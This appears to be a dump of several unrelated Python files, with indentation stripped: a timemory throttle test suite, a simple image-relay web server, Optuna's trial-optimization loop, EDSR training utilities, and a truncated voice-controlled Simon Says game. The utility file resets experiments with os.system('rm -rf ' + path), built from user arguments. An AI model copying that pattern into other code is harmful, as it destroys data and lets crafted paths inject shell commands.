# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from __future__ import absolute_import
__author__ = "Muhammad Haseeb"
__copyright__ = "Copyright 2020, The Regents of the University of California"
__credits__ = ["Muhammad Haseeb"]
__license__ = "MIT"
__version__ = "@PROJECT_VERSION@"
__maintainer__ = "Jonathan Madsen"
__email__ = "jrmadsen@lbl.gov"
__status__ = "Development"
try:
import mpi4py # noqa: F401
from mpi4py import MPI # noqa: F401
except ImportError:
pass
import os
import time
import unittest
import threading
import inspect
import timemory as tim
from timemory import settings as settings
# --------------------------- test setup variables ----------------------------------- #
# --------------------------- helper functions ----------------------------------------- #
# check availability of a component
def check_available(component):
return inspect.isclass(component)
# compute fibonacci
def fibonacci(n):
return n if n < 2 else (fibonacci(n - 1) + fibonacci(n - 2))
# sleep for n nanosec
def do_sleep(n):
time.sleep(n * 1e-9)
# cpu utilization for n nanosec
def consume(n):
# Python 3.7 has time_ns()
try:
# get current time in nsec
now = time.time_ns()
# try until time point
while time.time_ns() < (now + n):
pass
except AttributeError:
now = 1e9 * time.time()
# try until time point
while (1e9 * time.time()) < (now + n):
pass
# get auto_tuple config
def get_config(items=["wall_clock"]):
return [getattr(tim.component, x) for x in items]
# -------------------------- Thottle Tests set ---------------------------------------- #
# Throttle tests class
class TimemoryThrottleTests(unittest.TestCase):
# setup class: timemory settings
@classmethod
def setUpClass(self):
# set up environment variables
os.environ["TIMEMORY_VERBOSE"] = "1"
os.environ["TIMEMORY_COLLAPSE_THREADS"] = "OFF"
settings.parse()
settings.verbose = 1
settings.debug = False
settings.json_output = True
settings.mpi_thread = False
settings.file_output = True
settings.dart_output = True
settings.dart_count = 1
settings.banner = False
tim.trace.init("wall_clock", False, "throttle_tests")
self.nthreads = 1
# Tear down class: finalize
@classmethod
def tearDownClass(self):
# unset environment variables
del os.environ["TIMEMORY_VERBOSE"]
del os.environ["TIMEMORY_COLLAPSE_THREADS"]
pass
# ---------------------------------------------------------------------------------- #
# test expect_true
def test_expect_true(self):
"""expect_true"""
settings.debug = False
n = 2 * settings.throttle_count
tim.trace.push("true")
for i in range(n):
tim.trace.push(self.shortDescription())
tim.trace.pop(self.shortDescription())
tim.trace.pop("true")
self.assertTrue(tim.trace.is_throttled(self.shortDescription()))
# ---------------------------------------------------------------------------------- #
# test expect_false
def test_expect_false(self):
"""expect_false"""
settings.debug = False
n = 2 * settings.throttle_count
v = 2 * settings.throttle_value
for i in range(n):
tim.trace.push(self.shortDescription())
consume(v)
tim.trace.pop(self.shortDescription())
self.assertFalse(tim.trace.is_throttled(self.shortDescription()))
# ---------------------------------------------------------------------------------- #
def test_region_serial(self):
"""region_serial"""
settings.debug = False
def _run(name):
tim.region.push("rsthread")
n = 8 * settings.throttle_count
for i in range(n):
tim.region.push(name)
tim.region.pop(name)
tim.region.pop("rsthread")
# self.assertTrue(tim.trace.is_throttled(name))
for i in range(self.nthreads):
_run(self.shortDescription())
# print(tim.trace.is_throttled(self.shortDescription()))
# print(tim.trace.is_throttled("thread"))
# ---------------------------------------------------------------------------------- #
# test region_multithreaded
def test_region_multithreaded(self):
"""region_multithreaded"""
settings.debug = False
def _run(name):
tim.region.push("rthread")
n = 8 * settings.throttle_count
for i in range(n):
tim.region.push(name)
tim.region.pop(name)
tim.region.pop("rthread")
# check assertion
self.assertTrue(tim.trace.is_throttled(name))
threads = []
for i in range(self.nthreads):
thd = threading.Thread(target=_run, args=(self.shortDescription(),))
thd.start()
threads.append(thd)
for itr in threads:
itr.join()
# ---------------------------------------------------------------------------------- #
# test multithreaded
def test_multithreaded(self):
"""multithreaded"""
settings.debug = False
# _run function
def _run(name, idx):
import sys
self.assertTrue(sys.getprofile() is None)
self.assertTrue(sys.gettrace() is None)
_name = "{}_{}".format(name, idx)
_hash = tim.add_hash_id(_name)
n = 2 * settings.throttle_count
v = 2 * settings.throttle_value
if idx % 2 == 1:
for i in range(n):
tim.trace.push(_hash)
consume(v)
tim.trace.pop(_hash)
else:
for i in range(n):
tim.trace.push(_hash)
tim.trace.pop(_hash)
is_throttled = tim.trace.is_throttled(_name)
_answer = False if (idx % 2 == 1) else True
print("thread " + str(idx) + " throttling: " + str(is_throttled))
self.assertTrue(is_throttled == _answer)
# thread handles
threads = []
# all threads
tim.trace.push(self.shortDescription())
# make new threads
for i in range(self.nthreads):
thd = threading.Thread(
target=_run, args=(self.shortDescription(), i)
)
thd.start()
threads.append(thd)
# wait for join
for itr in threads:
itr.join()
tim.trace.pop(self.shortDescription())
# ----------------------------- main test runner -------------------------------------- #
# main runner
def run():
# run all tests
unittest.main()
if __name__ == "__main__":
tim.initialize([__file__])
run()
|
web.py
|
import requests
import http.server
import socketserver
import configparser
import threading
import time
import os
from shutil import copyfile
def refresh(url, name):
while True:
r = requests.get(url)
#print(r.headers.get('content-type'))
with open('html/cache/'+name+'.jpg', 'wb') as f:
f.write(r.content)
time.sleep(0.8)
def clear():
dir = 'html/streams'
for f in os.listdir(dir):
os.remove(os.path.join(dir, f))
class Relay:
def __init__(self, name):
self.name = name
self.port = int(config.get(name, 'RelayPort'))
self.silence = config.get(name, 'Silence')
self.debugging = config.get(name, 'Debugging')
self.url = config.get(name, 'StreamSourceURL')
self.refreshRate = int(config.get(name, 'RefreshRate'))
def setIndex(self):
templatefile = "html/template.html"
indexfile = "html/streams/"+self.name+".html"
copyfile(templatefile,indexfile)
with open(templatefile, 'r') as t:
t_data = t.read()
i_data = t_data.replace("#NAME#", self.name)
with open(indexfile, 'w') as i:
i.write(i_data)
def exec(self):
x = threading.Thread(name=self.name, target=refresh, args=(self.url, self.name))
x.setDaemon(True)
x.start()
self.setIndex()
class MyHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory="html", **kwargs)
def startServer():
with socketserver.TCPServer(("", 80), MyHandler) as httpd:
print ("Site is running.")
httpd.serve_forever()
config = configparser.ConfigParser()
config.read("relay.conf")
clear()
sections = config.sections()
for sec in sections:
r = Relay(sec)
r.exec()
startServer()
|
_optimize.py
|
from concurrent.futures import FIRST_COMPLETED
from concurrent.futures import Future
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import wait
import copy
import datetime
import gc
import itertools
import math
import os
import sys
from threading import Event
from threading import Thread
import time
from typing import Any
from typing import Callable
from typing import cast
from typing import List
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from typing import Type
from typing import Union
import warnings
import optuna
from optuna import exceptions
from optuna import logging
from optuna import progress_bar as pbar_module
from optuna import storages
from optuna import trial as trial_module
from optuna.trial import FrozenTrial
from optuna.trial import TrialState
_logger = logging.get_logger(__name__)
def _optimize(
study: "optuna.Study",
func: "optuna.study.ObjectiveFuncType",
n_trials: Optional[int] = None,
timeout: Optional[float] = None,
n_jobs: int = 1,
catch: Tuple[Type[Exception], ...] = (),
callbacks: Optional[List[Callable[["optuna.Study", FrozenTrial], None]]] = None,
gc_after_trial: bool = False,
show_progress_bar: bool = False,
) -> None:
if not isinstance(catch, tuple):
raise TypeError(
"The catch argument is of type '{}' but must be a tuple.".format(type(catch).__name__)
)
if not study._optimize_lock.acquire(False):
raise RuntimeError("Nested invocation of `Study.optimize` method isn't allowed.")
# TODO(crcrpar): Make progress bar work when n_jobs != 1.
progress_bar = pbar_module._ProgressBar(show_progress_bar and n_jobs == 1, n_trials, timeout)
study._stop_flag = False
try:
if n_jobs == 1:
_optimize_sequential(
study,
func,
n_trials,
timeout,
catch,
callbacks,
gc_after_trial,
reseed_sampler_rng=False,
time_start=None,
progress_bar=progress_bar,
)
else:
if show_progress_bar:
warnings.warn("Progress bar only supports serial execution (`n_jobs=1`).")
if n_jobs == -1:
n_jobs = os.cpu_count() or 1
time_start = datetime.datetime.now()
futures: Set[Future] = set()
with ThreadPoolExecutor(max_workers=n_jobs) as executor:
for n_submitted_trials in itertools.count():
if study._stop_flag:
break
if (
timeout is not None
and (datetime.datetime.now() - time_start).total_seconds() > timeout
):
break
if n_trials is not None and n_submitted_trials >= n_trials:
break
if len(futures) >= n_jobs:
completed, futures = wait(futures, return_when=FIRST_COMPLETED)
# Raise if exception occurred in executing the completed futures.
for f in completed:
f.result()
futures.add(
executor.submit(
_optimize_sequential,
study,
func,
1,
timeout,
catch,
callbacks,
gc_after_trial,
True,
time_start,
None,
)
)
finally:
study._optimize_lock.release()
progress_bar.close()
def _optimize_sequential(
study: "optuna.Study",
func: "optuna.study.ObjectiveFuncType",
n_trials: Optional[int],
timeout: Optional[float],
catch: Tuple[Type[Exception], ...],
callbacks: Optional[List[Callable[["optuna.Study", FrozenTrial], None]]],
gc_after_trial: bool,
reseed_sampler_rng: bool,
time_start: Optional[datetime.datetime],
progress_bar: Optional[pbar_module._ProgressBar],
) -> None:
if reseed_sampler_rng:
study.sampler.reseed_rng()
i_trial = 0
if time_start is None:
time_start = datetime.datetime.now()
while True:
if study._stop_flag:
break
if n_trials is not None:
if i_trial >= n_trials:
break
i_trial += 1
if timeout is not None:
elapsed_seconds = (datetime.datetime.now() - time_start).total_seconds()
if elapsed_seconds >= timeout:
break
try:
trial = _run_trial(study, func, catch)
except Exception:
raise
finally:
# The following line mitigates memory problems that can be occurred in some
# environments (e.g., services that use computing containers such as CircleCI).
# Please refer to the following PR for further details:
# https://github.com/optuna/optuna/pull/325.
if gc_after_trial:
gc.collect()
if callbacks is not None:
frozen_trial = copy.deepcopy(study._storage.get_trial(trial._trial_id))
for callback in callbacks:
callback(study, frozen_trial)
if progress_bar is not None:
progress_bar.update((datetime.datetime.now() - time_start).total_seconds())
study._storage.remove_session()
def _run_trial(
study: "optuna.Study",
func: "optuna.study.ObjectiveFuncType",
catch: Tuple[Type[Exception], ...],
) -> trial_module.Trial:
trial = study.ask()
state: Optional[TrialState] = None
values: Optional[List[float]] = None
func_err: Optional[Exception] = None
func_err_fail_exc_info: Optional[Any] = None
# Set to a string if `func` returns correctly but the return value violates assumptions.
values_conversion_failure_message: Optional[str] = None
stop_event: Optional[Event] = None
thread: Optional[Thread] = None
if study._storage.is_heartbeat_enabled():
study._storage.fail_stale_trials()
stop_event = Event()
thread = Thread(
target=_record_heartbeat, args=(trial._trial_id, study._storage, stop_event)
)
thread.start()
try:
value_or_values = func(trial)
except exceptions.TrialPruned as e:
# TODO(mamu): Handle multi-objective cases.
state = TrialState.PRUNED
func_err = e
except Exception as e:
state = TrialState.FAIL
func_err = e
func_err_fail_exc_info = sys.exc_info()
else:
# TODO(hvy): Avoid checking the values both here and inside `Study.tell`.
values, values_conversion_failure_message = _check_and_convert_to_values(
len(study.directions), value_or_values, trial.number
)
if values_conversion_failure_message is not None:
state = TrialState.FAIL
else:
state = TrialState.COMPLETE
if study._storage.is_heartbeat_enabled():
assert stop_event is not None
assert thread is not None
stop_event.set()
thread.join()
# `Study.tell` may raise during trial post-processing.
try:
study.tell(trial, values=values, state=state)
except Exception:
raise
finally:
if state == TrialState.COMPLETE:
study._log_completed_trial(trial, cast(List[float], values))
elif state == TrialState.PRUNED:
_logger.info("Trial {} pruned. {}".format(trial.number, str(func_err)))
elif state == TrialState.FAIL:
if func_err is not None:
_logger.warning(
"Trial {} failed because of the following error: {}".format(
trial.number, repr(func_err)
),
exc_info=func_err_fail_exc_info,
)
elif values_conversion_failure_message is not None:
_logger.warning(values_conversion_failure_message)
else:
assert False, "Should not reach."
else:
assert False, "Should not reach."
if state == TrialState.FAIL and func_err is not None and not isinstance(func_err, catch):
raise func_err
return trial
def _check_and_convert_to_values(
n_objectives: int, original_value: Union[float, Sequence[float]], trial_number: int
) -> Tuple[Optional[List[float]], Optional[str]]:
if isinstance(original_value, Sequence):
if n_objectives != len(original_value):
return (
None,
(
f"Trial {trial_number} failed, because the number of the values "
f"{len(original_value)} is did not match the number of the objectives "
f"{n_objectives}."
),
)
else:
_original_values = list(original_value)
else:
_original_values = [original_value]
_checked_values = []
for v in _original_values:
checked_v, failure_message = _check_single_value(v, trial_number)
if failure_message is not None:
# TODO(Imamura): Construct error message taking into account all values and do not
# early return
# `value` is assumed to be ignored on failure so we can set it to any value.
return None, failure_message
elif isinstance(checked_v, float):
_checked_values.append(checked_v)
else:
assert False
return _checked_values, None
def _check_single_value(
original_value: float, trial_number: int
) -> Tuple[Optional[float], Optional[str]]:
value = None
failure_message = None
try:
value = float(original_value)
except (
ValueError,
TypeError,
):
failure_message = (
f"Trial {trial_number} failed, because the value {repr(original_value)} could not be "
"cast to float."
)
if value is not None and math.isnan(value):
value = None
failure_message = (
f"Trial {trial_number} failed, because the objective function returned "
f"{original_value}."
)
return value, failure_message
def _record_heartbeat(trial_id: int, storage: storages.BaseStorage, stop_event: Event) -> None:
heartbeat_interval = storage.get_heartbeat_interval()
assert heartbeat_interval is not None
while True:
storage.record_heartbeat(trial_id)
if stop_event.is_set():
return
time.sleep(heartbeat_interval)
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
from scipy import signal
from skimage.metrics import structural_similarity as ssim
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
# Ref: https://github.com/HolmesShuan/EDSR-ssim
def matlab_style_gauss2D(shape=(3,3),sigma=0.5):
"""
2D gaussian mask - should give the same result as MATLAB's fspecial('gaussian',[shape],[sigma])
Acknowledgement : https://stackoverflow.com/questions/17190649/how-to-obtain-a-gaussian-filter-in-python (Author@ali_m)
"""
m,n = [(ss-1.)/2. for ss in shape]
y,x = np.ogrid[-m:m+1,-n:n+1]
h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )
h[ h < np.finfo(h.dtype).eps*h.max() ] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
return h
def calc_ssim(X, Y, scale, rgb_range, dataset=None, sigma=1.5, K1=0.01, K2=0.03, R=255):
'''
X : y channel (i.e., luminance) of transformed YCbCr space of X
Y : y channel (i.e., luminance) of transformed YCbCr space of Y
Please follow the setting of psnr_ssim.m in EDSR (Enhanced Deep Residual Networks for Single Image Super-Resolution CVPRW2017).
Official Link : https://github.com/LimBee/NTIRE2017/tree/db34606c2844e89317aac8728a2de562ef1f8aba
The authors of EDSR use MATLAB's ssim as the evaluation tool,
thus this function is the same as ssim.m in MATLAB with C(3) == C(2)/2.
'''
gaussian_filter = matlab_style_gauss2D((11, 11), sigma)
if dataset and dataset.dataset.benchmark:
shave = scale
if X.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = X.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
X = X.mul(convert).sum(dim=1)
Y = Y.mul(convert).sum(dim=1)
else:
shave = scale + 6
X = X[..., shave:-shave, shave:-shave].squeeze().cpu().numpy().astype(np.float64)
Y = Y[..., shave:-shave, shave:-shave].squeeze().cpu().numpy().astype(np.float64)
window = gaussian_filter
ux = signal.convolve2d(X, window, mode='same', boundary='symm')
uy = signal.convolve2d(Y, window, mode='same', boundary='symm')
uxx = signal.convolve2d(X*X, window, mode='same', boundary='symm')
uyy = signal.convolve2d(Y*Y, window, mode='same', boundary='symm')
uxy = signal.convolve2d(X*Y, window, mode='same', boundary='symm')
vx = uxx - ux * ux
vy = uyy - uy * uy
vxy = uxy - ux * uy
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1, 2 * vxy + C2, ux ** 2 + uy ** 2 + C1, vx + vy + C2))
D = B1 * B2
S = (A1 * A2) / D
mssim = S.mean()
return mssim
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
SimonVoiceGame.py
|
"""Welcome to Joe Ricci's Simon Says Game
In this game you can speak to your computer
as your input instead of typing or clicking.
You will see a splash screen with instructions.
Follow the instructions shown on display to play the game.
Another option is that you can enable the Debug mode and the game will play itself!
You can see how the game works and all of the troubleshooting text that appears in the CLI.
There are two ways you can speak to the program and it will recognize your input.
1) Say each color in order
2) Say 'and' in between each color
As you progress, the patterns get harder.
the maximum level is 20, once you pass this point you win!
Good Luck!
"""
"""Note: There is a bug in the system when using debug, sometimes you do not have to click inside the window
in order to continue the process."""
import pygame as pg
import speech_recognition as sr
import time, gtts, sys, os, pyaudio, random,wave
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
import speech
import pywin32_system32
from threading import Thread
r = sr.Recognizer()
colorinputpattern = []
debug = True
#Class options contains all the variables used inside the game.
class options:
# Game Title Window
TITLE = "Voice Simon Says Game"
# Colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
#Set default level
LEVEL = 1
# Set colors
BGROUND = WHITE
# Game FPS
FPS = 30
# Window Size
W_WIDTH = 640
W_HEIGHT = 680
COUNT = True
COLORS = ['red', 'blue', 'green', 'yellow']
COLORPATTERN = []
MOUSEPATTERN = []
VOICEPATTERN = []
W_WIDTH = 640
W_HEIGHT = 480
BOX_WIDTH = (W_WIDTH / 2) - 10
BOX_HEIGHT = (W_HEIGHT / 2) - 15
score = 0
BLUESQUARE = pg.Rect(0, 0, BOX_WIDTH, BOX_HEIGHT)
REDSQUARE = pg.Rect(0, (W_HEIGHT / 2), BOX_WIDTH, BOX_HEIGHT)
YELLOWSQUARE = pg.Rect(W_WIDTH / 2, 0, BOX_WIDTH + 10, BOX_HEIGHT)
GREENSQUARE = pg.Rect(W_WIDTH / 2, W_HEIGHT / 2, BOX_WIDTH + 10, BOX_HEIGHT)
CURRENTSTEP = 0
WAITINGFORINPUT = False
#Class game contains majority of the code used to run the game.
class game:
level = 1
splash = True
def __init__(self):
if debug is True:
print('Running initialization')
global pattern
global colorinputpattern
pg.init()
self.screen = pg.display.set_mode((options.W_WIDTH, options.W_HEIGHT))
pg.display.set_caption(options.TITLE)
if game.splash is True:
self.splashscreen()
time.sleep(5)
game.splash = False
#Setup the background for the game
self.background()
# Draw each square onto background
self.drawBoxes()
# Blit everything to the screen
pg.display.flip()
self.clock = pg.time.Clock()
self.running = True
self.start_game()
# This function is from the play sound example done in class, modified to be used appropriately in this program
def playsound(self):
inputstream = wave.open(
"C:\\Users\\jricc3\\OneDrive - University of New Haven\\Fall 2016\\Adv Python\\Class 9\\shortbeep.wav")
pyoutputstream = pyaudio.PyAudio()
outputstream = pyoutputstream.open(output=True, rate=inputstream.getframerate(),
channels=inputstream.getnchannels(),
format=pyoutputstream.get_format_from_width(inputstream.getsampwidth()))
chunksize = 1024
data = inputstream.readframes(chunksize)
while data != "":
outputstream.write(data)
data = inputstream.readframes(chunksize)
outputstream.stop_stream()
outputstream.close()
inputstream.close()
pyoutputstream.terminate()
return
#Create the background for the game
def background(self):
# Fill background
background = pg.Surface(self.screen.get_size())
background = background.convert()
background.fill((options.BGROUND))
self.screen.blit(background, (0, 0))
self.drawBoxes()
#Start a new game
def new(self):
game.__init__(self)
#Create a pattern for the user to try and copy
def setPattern(self, color):
options.COLORPATTERN.append(color)
print("Here is the color pattern:" +str(options.COLORPATTERN))
self.updateBoxes(options.COLORPATTERN)
pass
#Draw the boxes on screen
def drawBoxes(self):
level = len(options.COLORPATTERN)
if debug == True:
print('drawBoxes')
pg.draw.rect(self.screen, options.BLUE, options.BLUESQUARE, 1)
pg.draw.rect(self.screen, options.RED, options.REDSQUARE, 1)
pg.draw.rect(self.screen, options.YELLOW, options.YELLOWSQUARE, 1)
pg.draw.rect(self.screen, options.GREEN, options.GREENSQUARE, 1)
myfont = pg.font.SysFont("Comic Sans MS", 14)
label1 = myfont.render("Level: " + str(level), 1, options.BLACK)
self.screen.blit(label1, (290, 462))
#Update the boxes in the game to represent the updated color pattern
def updateBoxes(self, COLORPATTERN):
for i in COLORPATTERN:
thread = Thread(target = game.playsound, args = (10, ))
if debug == True:
print("updating boxes")
if i == 'blue':
#self.playsound()
self.background()
pg.display.update()
pg.draw.rect(self.screen, options.BLUE, options.BLUESQUARE, 0)
pg.display.flip()
time.sleep(1)
pg.draw.rect(self.screen, options.WHITE, options.BLUESQUARE, 0)
pg.display.flip()
self.background()
thread.start()
elif i == 'red':
#self.playsound()
self.background()
pg.display.update()
pg.draw.rect(self.screen, options.RED, options.REDSQUARE, 0)
pg.display.flip()
time.sleep(1)
pg.draw.rect(self.screen, options.WHITE, options.REDSQUARE, 0)
pg.display.flip()
self.background()
thread.start()
elif i == 'yellow':
self.background()
pg.display.update()
pg.draw.rect(self.screen, options.YELLOW,options.YELLOWSQUARE, 0)
pg.display.flip()
time.sleep(1)
pg.display.update()
pg.draw.rect(self.screen, options.WHITE, options.YELLOWSQUARE, 0)
pg.display.flip()
self.background()
thread.start()
elif i == "green":
#self.playsound()
self.background()
pg.display.update()
pg.draw.rect(self.screen, options.GREEN, options.GREENSQUARE, 0)
pg.display.flip()
time.sleep(1)
pg.draw.rect(self.screen, options.WHITE, options.GREENSQUARE, 0)
pg.display.flip()
self.background()
thread.start()
time.sleep(1)
self.background()
def start_game(self):
#Let us know that we are in the start game function
if debug == True:
print('Game has started')
global WAITINGFORINPUT
global CURRENTSTEP
global clickedButton
global colorinputpattern
clickedButton = None
#randomly pick a color for the options and assign it to color
color = random.choice(options.COLORS)
#Wait until the player clicks in the game window and the color pattern has been established
for event in pg.event.get():
if event.type == pg.MOUSEBUTTONUP and options.WAITINGFORINPUT is True:
#Check to see that the event worked and the waiting for input logic worked
if debug == True:
print('You clicked in the game')
#check the color input pattern
colorinputpattern = game.getButtonClicked(self)
options.WAITINGFORINPUT = False
#When we are not waiting for user input, append a new color to the color list and set watiing input to true
if not options.WAITINGFORINPUT:
if debug == True:
print('Waiting for input and appending to color list')
self.setPattern(color)
options.WAITINGFORINPUT = True
else:
#Enter a loop while waiting for the user to click inside the window
if debug is True:
print('Waiting for user input')
else:
print('')
def splashscreen(self):
background = pg.Surface(self.screen.get_size())
background = background.convert()
background.fill(options.BLACK)
# pick a font and set its size
myfont = pg.font.SysFont("Comic Sans MS", 24)
# apply it to text on a label
label1 = myfont.render("Welcome to Joe Ricci's ", 1, options.YELLOW)
label2= myfont.render("Simon Says Voice Game!", 1 , options.YELLOW)
# put the label object on the screen at specified point
self.screen.blit(label1, (210, 150))
self.screen.blit(label2, (200, 200))
# Blit everything to the screen
pg.display.flip()
time.sleep(5)
myfont = pg.font.SysFont("Comic Sans MS", 24)
label1 = myfont.render("Welcome to Joe Ricci's ", 1, options.BLACK)
label2 = myfont.render("Simon Says Voice Game!", 1, options.BLACK)
self.screen.blit(label1, (210, 150))
self.screen.blit(label2, (200, 200))
pg.display.flip()
background.fill(options.BLACK)
instruction = myfont.render('The game will begin shortly', 1 ,options.YELLOW, options.BLACK)
instruction2 = myfont.render('so in the mean time, here are the instructions:', 1, options.YELLOW, options.BLACK)
# put the label object on the screen at specified point and write to screen
self.screen.blit(instruction, (20, 150))
self.screen.blit(instruction2, (50, 200))
# Show all items drawn to screen
pg.display.flip()
time.sleep(5)
background.fill(options.BLACK)
instruction = myfont.render('The game will begin shortly,', 1, options.BLACK, options.BLACK)
instruction2 = myfont.render('so in the mean time, here are the instructions:', 1, options.BLACK, options.BLACK)
# put the label object on the screen at specified point
self.screen.blit(instruction, (20, 150))
self.screen.blit(instruction2, (50, 200))
# Blit everything to the screen
pg.display.flip()
background.fill(options.BLACK)
instruction = myfont.render('A colored box will flash', 1, options.YELLOW, options.BLACK)
instruction2 = myfont.render('When you are ready, click anywhere in the window', 1, options.YELLOW, options.BLACK)
instruction3 = myfont.render('and say the color that you saw flash.', 1, options.YELLOW, options.BLACK)
instruction4 = myfont.render('As you progress through the levels,',1 , options.YELLOW, options.BLACK)
instruction5 = myfont.render('the pattern will get longer.', 1, options.YELLOW, options.BLACK)
